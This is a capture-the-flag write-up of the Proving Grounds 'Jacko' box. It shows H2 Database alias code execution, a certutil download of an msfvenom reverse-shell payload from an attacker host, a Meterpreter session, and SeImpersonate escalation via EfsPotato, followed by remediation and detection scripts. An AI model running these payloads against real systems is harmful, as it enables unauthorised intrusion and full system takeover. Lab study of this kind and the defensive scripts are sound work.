Box Overview

Jacko is a Windows machine from Offensive Security’s Proving Grounds demonstrating H2 Database exploitation for remote code execution and privilege escalation via SeImpersonate token abuse.

Difficulty: Intermediate (though arguably easier)

Enumeration

Nmap Scan

sudo nmap -sS -sC -A [TARGET_IP] -T4 -oN first.scan -p-

Key ports identified:

  • Port 8082 - H2 Database Console (web interface)
  • Port 22 - SSH
  • Additional Windows services

H2 Database Console - Port 8082

Accessing http://[TARGET_IP]:8082 reveals the H2 Database Console - a web-based SQL interface.

Key observation: The “Connect” button allows unauthenticated access to execute SQL queries!

Exploitation Research

Vulnerability Discovery

searchsploit h2 database

Found: H2 Database 1.4.199 - JNI Code Execution

searchsploit -m java/local/49384.txt

Vulnerability: H2 Database allows arbitrary Java code execution through JNI (Java Native Interface) via SQL queries.

Exploit Analysis

The exploit leverages H2’s ability to create custom functions and execute Java code:

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('java.lang.Runtime.getRuntime().exec("command")');

This allows arbitrary command execution on the underlying Windows system!

Initial Access

Payload Strategy

Two-stage approach:

  1. Download reverse shell executable using certutil
  2. Execute the downloaded payload

Stage 1 - Download Payload

Generate reverse shell:

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.45.222 LPORT=9001 \
  -f exe -o shell_jacko.exe

Host payload:

python3 -m http.server 80

SQL Injection to download:

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f http://192.168.45.222:80/shell_jacko.exe C:\\Users\\tony\\Desktop\\shell_jacko.exe").getInputStream()).useDelimiter("\\Z").next()');

Explanation:

  • certutil -urlcache -split -f - Windows utility to download files
  • Downloads payload to C:\Users\tony\Desktop\
  • Wrapped in Java Scanner to capture output

Stage 2 - Execute Payload

Setup Metasploit listener:

sudo msfconsole -q
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.45.222
msf6 exploit(multi/handler) > set LPORT 9001
msf6 exploit(multi/handler) > run

Trigger execution via SQL:

CALL JNIScriptEngine_eval('java.lang.Runtime.getRuntime().exec("C:\\Users\\tony\\Desktop\\shell_jacko.exe")');

Meterpreter session established!

[*] Sending stage (176198 bytes) to 192.168.241.66
[*] Meterpreter session 1 opened (192.168.45.222:9001 -> 192.168.241.66:50470)

User Flag

meterpreter > shell
C:\Users\tony\Desktop> whoami
jacko\tony

C:\Users\tony\Desktop> type local.txt
11f7879da5b172a5ff63e07e94556b95

User flag captured!

Privilege Escalation

Token Privilege Enumeration

meterpreter > getuid
Server username: JACKO\tony

meterpreter > getprivs

Key finding: User has SeImpersonatePrivilege enabled! 🎯

SeImpersonate Exploitation

Vulnerability: a process holding SeImpersonatePrivilege may adopt the security token of any client that authenticates to it, including SYSTEM-level services that can be made to connect.

Metasploit automation:

meterpreter > getsystem

Metasploit automatically attempts multiple privilege escalation techniques:

Successful technique: Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)

...got system via technique 6 (Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)).

System access obtained! 🎯

Root Flag

meterpreter > shell

C:\Users\tony\Desktop> whoami
nt authority\system

C:\Users\tony\Desktop> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type proof.txt
ccf816fd96596706c79367a7ab205502

Root flag captured!

Attack Chain Summary

  1. Service Discovery → H2 Database Console on port 8082
  2. Unauthenticated Access → Connected to database without credentials
  3. RCE Research → Found JNI code execution exploit
  4. Payload Download → Used certutil via SQL injection
  5. Meterpreter Shell → Caught reverse connection as user tony
  6. Privilege Check → Identified SeImpersonatePrivilege
  7. Automatic Escalation → Metasploit’s getsystem via EfsPotato
  8. System Access → Full domain/system compromise

Vulnerability Analysis

H2 Database JNI Code Execution

CVE: Not officially assigned (considered a feature abuse)

Affected Versions: H2 Database ≤ 1.4.199

Root Cause:

H2 Database allows creation of custom SQL functions using Java:

CREATE ALIAS function_name FOR "fully.qualified.ClassName.methodName";

Because the alias body can also be Java source that H2 compiles at runtime, this on its own yields arbitrary command execution:

CREATE ALIAS SHELLEXEC AS $$
String shellexec(String cmd) throws java.io.IOException {
    java.util.Scanner s = new java.util.Scanner(
        Runtime.getRuntime().exec(cmd).getInputStream()
    ).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}
$$;
CALL SHELLEXEC('whoami');

Why This Works:

  1. H2 runs with privileges of the Java process
  2. No authentication required on default installation
  3. Network accessible (0.0.0.0:8082 by default)
  4. Full Java Runtime available
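As an added example that is not part of this writeup, the Python below flags the two alias forms shown above when run over H2 statements taken from an application query log or a SQL proxy; the allowlist of class prefixes is an assumed policy modelled on H2's h2.allowedClasses setting, and the sample statements are the ones quoted in this writeup plus one benign query.

```python
# Added example (not from the writeup): flag the H2 alias patterns shown above
# in SQL taken from an application query log or a SQL proxy. The allowlist of
# class prefixes is an assumed policy (modelled on H2's h2.allowedClasses
# setting); the sample statements are the ones quoted in this writeup.
import re

ALLOWED_CLASS_PREFIXES = ("org.h2.", "com.example.app.")   # assumed policy

FOR_ALIAS = re.compile(
    r'CREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(\w+)\s+FOR\s+"([^"]+)"', re.I)
SRC_ALIAS = re.compile(
    r'CREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(\w+)\s+AS\s+\$\$', re.I)
EXEC_CALL = re.compile(
    r'CALL\s+\w+\s*\(.*?(Runtime\.getRuntime\(\)|ProcessBuilder)', re.I | re.S)

def review_statement(sql):
    """Return findings for one H2 statement; an empty list means nothing flagged."""
    findings = []
    m = FOR_ALIAS.search(sql)
    if m:
        cls = m.group(2).rsplit(".", 1)[0]          # drop the method name
        if not cls.startswith(ALLOWED_CLASS_PREFIXES):
            findings.append(f"alias {m.group(1)} binds non-allowlisted class {cls}")
    m = SRC_ALIAS.search(sql)
    if m:
        findings.append(f"alias {m.group(1)} compiles inline Java source")
    if EXEC_CALL.search(sql):
        findings.append("CALL argument spawns a process via Java")
    return findings

def review_log(statements):
    """Map the index of each flagged statement to its findings."""
    result = {}
    for i, sql in enumerate(statements):
        findings = review_statement(sql)
        if findings:
            result[i] = findings
    return result

SAMPLE_LOG = [   # statements quoted in the writeup plus one benign query
    'CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";',
    "CALL JNIScriptEngine_eval('java.lang.Runtime.getRuntime().exec(\"command\")');",
    "CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) { return cmd; } $$;",
    'CREATE ALIAS IF NOT EXISTS APP_HASH FOR "com.example.app.Util.hash";',
    "SELECT * FROM users WHERE id = 1;",
]

if __name__ == "__main__":
    for idx, findings in review_log(SAMPLE_LOG).items():
        print(idx, findings)
```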

SeImpersonatePrivilege Abuse

Token Privileges:

Windows services run with special privileges. SeImpersonatePrivilege (the "Impersonate a client after authentication" user right) lets a process adopt the security token of a client that has authenticated to it, which is how service accounts act on behalf of their callers.

Exploitation Methods:

1. EfsPotato (Used Here)

  • Abuses the Encrypting File System Remote Protocol (EFSRPC)
  • Triggers SYSTEM-level authentication
  • Captures and impersonates SYSTEM token
  • No DLL drop required

2. Alternative Techniques

  • JuicyPotato - COM/DCOM abuse
  • RoguePotato - OXID resolver abuse
  • PrintSpoofer - Print Spooler service abuse
  • GodPotato - Latest technique (2022+)

Why It Works:

Services with SeImpersonate can:

  1. Listen on a named pipe
  2. Trigger SYSTEM-level connection (via EFSRPC, DCOM, etc.)
  3. Impersonate the connecting SYSTEM token
  4. Execute commands as SYSTEM

Difficulty Assessment

Rated: Intermediate
Actual Difficulty: Easy-Intermediate

Why it’s easier than rated:

  1. Unauthenticated RCE - No password cracking required
  2. Public Exploit - Searchsploit has ready-made payload
  3. Automatic Privesc - Metasploit’s getsystem does everything
  4. No AV Bypass - Meterpreter worked without evasion

What makes it “Intermediate”:

  1. Requires understanding of Java/JNI concepts
  2. Two-stage payload delivery
  3. SQL injection syntax knowledge
  4. Token privilege understanding (educational value)

Remediation

H2 Database Security

1. Authentication

# h2.properties
webAllowOthers=false
webSSL=true
tcpAllowOthers=false

2. Network Restrictions

# Bind to localhost only: -webAllowOthers is a presence flag with no argument,
# so leave it out (passing "false" after it is rejected as an unsupported option)
java -cp h2.jar org.h2.tools.Server -web -webPort 8082

3. Disable Remote Access

-- CREATE ALIAS needs admin rights, so connect the application as a non-admin user
-- (not sa); -Dh2.allowedClasses=... on the JVM further limits loadable classes
CREATE USER IF NOT EXISTS APPUSER PASSWORD 'change-me';
GRANT SELECT, INSERT, UPDATE, DELETE ON app_table TO APPUSER;  -- app_table: placeholder

4. Update H2

  • Use H2 2.x versions with security improvements
  • Implement proper authentication
  • Run with minimal Java permissions

SeImpersonate Mitigation

1. Principle of Least Privilege

# Remove unnecessary privileges from service logons and run services under a
# group managed service account (gMSA); -DNSHostName is required for a gMSA
# (example.local is a placeholder domain)
New-ADServiceAccount -Name WebAppSvc -DNSHostName WebAppSvc.example.local -PrincipalsAllowedToRetrieveManagedPassword WebServers$

2. Windows Defender Application Guard

  • Isolate sensitive services
  • Use containers when possible
  • Implement AppLocker policies

3. Monitoring

# Enable audit of privilege use
auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable
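Beyond the audit policy above, process-creation telemetry gives a direct view of this box's chain and of the Blue Team points at the end. The Python below is an added example, not part of the writeup: it runs detection rules over constructed Sysmon Event ID 1 records (the java.exe path and all sample events are assumptions) and flags the JVM spawning certutil with -urlcache, the JVM running a binary from a user profile, and a SYSTEM process whose parent ran as an ordinary user, the trace left by a named-pipe impersonation privesc.

```python
# Added example (not from the writeup): detection logic for the chain above,
# run over constructed Sysmon Event ID 1 (process create) records. Field names
# follow Sysmon's (Image, ParentImage, CommandLine, User; ParentUser needs a
# recent Sysmon); the sample events are constructed, not real telemetry.
import re

JVM_IMAGES = ("java.exe", "javaw.exe")                   # H2 runs inside the JVM
USER_PROFILE = re.compile(r"\\users\\[^\\]+\\", re.I)    # C:\Users\<name>\... paths

def detect(events):
    """Return (rule, event) pairs for records matching the writeup's chain."""
    hits = []
    for ev in events:
        image = ev["Image"].lower()
        parent = ev["ParentImage"].lower()
        cmd = ev.get("CommandLine", "").lower()
        parent_is_jvm = parent.rsplit("\\", 1)[-1] in JVM_IMAGES
        # Stage 1: the JVM hosting H2 spawns certutil as a downloader
        if parent_is_jvm and image.endswith("\\certutil.exe") and "-urlcache" in cmd:
            hits.append(("jvm_spawned_certutil_download", ev))
        # Stage 2: the JVM executes a binary dropped in a user profile
        elif parent_is_jvm and USER_PROFILE.search(image):
            hits.append(("jvm_ran_user_profile_binary", ev))
        # Privesc: a SYSTEM process whose parent ran as an ordinary user
        if ev.get("User", "").upper().endswith("\\SYSTEM") and \
                not ev.get("ParentUser", "").upper().endswith("\\SYSTEM"):
            hits.append(("system_child_of_user_process", ev))
    return hits

JAVA = r"C:\Program Files\Java\jre\bin\java.exe"         # assumed install path
SAMPLE_EVENTS = [   # constructed records modelled on the writeup's chain
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": JAVA,
     "CommandLine": r"certutil -urlcache -split -f http://192.168.45.222:80/shell_jacko.exe C:\Users\tony\Desktop\shell_jacko.exe",
     "User": r"JACKO\tony", "ParentUser": r"JACKO\tony"},
    {"Image": r"C:\Users\tony\Desktop\shell_jacko.exe", "ParentImage": JAVA,
     "CommandLine": r"C:\Users\tony\Desktop\shell_jacko.exe",
     "User": r"JACKO\tony", "ParentUser": r"JACKO\tony"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\tony\Desktop\shell_jacko.exe", "CommandLine": "cmd.exe",
     "User": r"NT AUTHORITY\SYSTEM", "ParentUser": r"JACKO\tony"},
    {"Image": r"C:\Windows\System32\svchost.exe",              # benign: SYSTEM parent
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs",
     "User": r"NT AUTHORITY\SYSTEM", "ParentUser": r"NT AUTHORITY\SYSTEM"},
]

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(f"{rule}: {ev['Image']} (parent {ev['ParentImage']})")
```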

4. Patch Management

  • Keep Windows updated (EfsPotato patched in newer builds)
  • Apply security updates regularly
  • Test patches in non-prod first

Tools Used

  • nmap
  • searchsploit
  • msfvenom
  • Metasploit Framework
  • Python HTTP server
  • certutil (on target)

Techniques

  • Service enumeration
  • Public exploit research
  • SQL injection for RCE
  • Two-stage payload delivery
  • Meterpreter shells
  • Token privilege abuse
  • Named pipe impersonation (EfsPotato)

Key Takeaways

For Red Team

  1. Check for default configurations - H2 often runs unauthenticated
  2. Use Metasploit when appropriate - Automation saves time
  3. SeImpersonate = Easy Win - Check token privileges early
  4. Certutil is gold - Built-in Windows download utility

For Blue Team

  1. Never expose databases publicly - Even “development” instances
  2. Default configs kill - Always harden before deployment
  3. Monitor SeImpersonate usage - Rare for legitimate use cases
  4. Named pipe monitoring - Detect impersonation attacks

Educational Value

This box excellently demonstrates:

  • Database security misconfigurations
  • Java/JNI code execution concepts
  • Windows token privilege system
  • Multiple privilege escalation techniques
  • Real-world attack chains

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice
Difficulty Rating: Intermediate


“Progress is being made!” - Sometimes the rated difficulty is just… wrong.